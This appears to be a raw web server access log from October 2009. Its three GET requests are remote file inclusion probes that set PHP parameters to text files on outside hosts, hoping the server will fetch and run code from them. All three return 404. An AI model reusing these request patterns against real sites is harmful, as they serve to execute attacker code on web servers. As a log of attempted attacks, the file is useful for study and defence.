174.143.3.188 - - [25/Oct/2009:23:49:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
210.115.180.221 - - [25/Oct/2009:23:50:27 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.115.180.221 - - [25/Oct/2009:23:50:27 -0700] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
